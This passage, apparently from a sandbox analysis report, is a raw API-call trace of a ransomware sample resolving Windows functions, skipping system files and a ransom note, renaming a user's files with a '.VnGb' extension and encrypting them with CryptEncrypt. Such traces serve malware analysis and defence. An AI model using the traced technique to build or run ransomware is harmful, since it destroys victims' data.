(lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.183] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.183] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.183] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.183] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.183] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.183] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.183] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.183] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.183] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.183] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.183] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.184] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.184] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.184] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.184] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.184] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.184] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.184] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.184] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.184] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.184] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.184] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.184] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.184] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.184] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.184] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.184] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.184] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.184] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.185] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.185] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.185] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.185] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.185] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.185] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.185] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.185] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.185] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.185] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.185] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.185] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.185] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.185] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.185] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.185] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.185] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.185] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.185] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.186] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.186] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.186] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.186] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.186] lstrlenA (lpString="DELETEATOM") returned 10 [0086.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.186] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.186] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.186] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.186] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.186] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.186] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.186] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.186] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.186] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.186] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.187] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.187] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.187] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.187] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.187] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.187] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.187] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.187] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.187] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.187] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.187] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.187] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.187] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.187] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.187] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.187] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.187] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.187] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.187] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.188] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.188] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.188] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.188] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.188] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.188] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.188] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.188] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.188] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.188] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.188] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.188] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.188] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\FcUVZVQezWKj.gif") returned 61 [0086.188] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\FcUVZVQezWKj.gif.VnGb") returned 66 [0086.188] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\FcUVZVQezWKj.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\fcuvzvqezwkj.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\FcUVZVQezWKj.gif.VnGb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\fcuvzvqezwkj.gif.vngb"), dwFlags=0x0) returned 1 [0086.189] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.189] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.189] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.190] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327c3e20, ftCreationTime.dwHighDateTime=0x1d4c98a, ftLastAccessTime.dwLowDateTime=0x78305be0, ftLastAccessTime.dwHighDateTime=0x1d4cb7e, ftLastWriteTime.dwLowDateTime=0x78305be0, ftLastWriteTime.dwHighDateTime=0x1d4cb7e, nFileSizeHigh=0x0, nFileSizeLow=0x10642, dwReserved0=0x0, dwReserved1=0x0, cFileName="gGxu.bmp", cAlternateFileName="")) returned 1 [0086.190] lstrcmpiW (lpString1="gGxu.bmp", lpString2="DECRYPT-FILES.txt") returned 1 [0086.190] lstrcmpiW (lpString1="gGxu.bmp", lpString2="autorun.inf") returned 1 [0086.190] lstrcmpiW (lpString1="gGxu.bmp", lpString2="boot.ini") returned 1 [0086.190] lstrcmpiW (lpString1="gGxu.bmp", lpString2="desktop.ini") returned 1 [0086.190] lstrcmpiW (lpString1="gGxu.bmp", lpString2="ntuser.dat") returned -1 [0086.190] lstrcmpiW (lpString1="gGxu.bmp", lpString2="iconcache.db") returned -1 [0086.190] lstrcmpiW (lpString1="gGxu.bmp", lpString2="bootsect.bak") returned 1 [0086.190] lstrcmpiW (lpString1="gGxu.bmp", lpString2="ntuser.dat.log") returned -1 [0086.190] lstrcmpiW (lpString1="gGxu.bmp", lpString2="thumbs.db") returned -1 [0086.190] lstrcmpiW (lpString1="gGxu.bmp", lpString2="Bootfont.bin") returned 1 [0086.190] lstrlenW (lpString="gGxu.bmp") returned 8 [0086.190] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0086.190] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0086.190] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0086.190] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0086.190] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.190] lstrlenW (lpString="gGxu.bmp") returned 8 [0086.190] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.190] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="gGxu.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\gGxu.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\gGxu.bmp" [0086.190] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\gGxu.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\ggxu.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.191] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=67138) returned 1 [0086.191] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.191] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.191] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.191] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.191] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.191] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.191] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0086.193] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.193] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.194] CloseHandle (hObject=0x42c) returned 1 [0086.194] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.194] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.195] CloseHandle (hObject=0x0) returned 0 [0086.195] CloseHandle (hObject=0x428) returned 1 [0086.195] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.195] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.195] GetTickCount () returned 0x114e003 [0086.195] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.195] lstrlenW 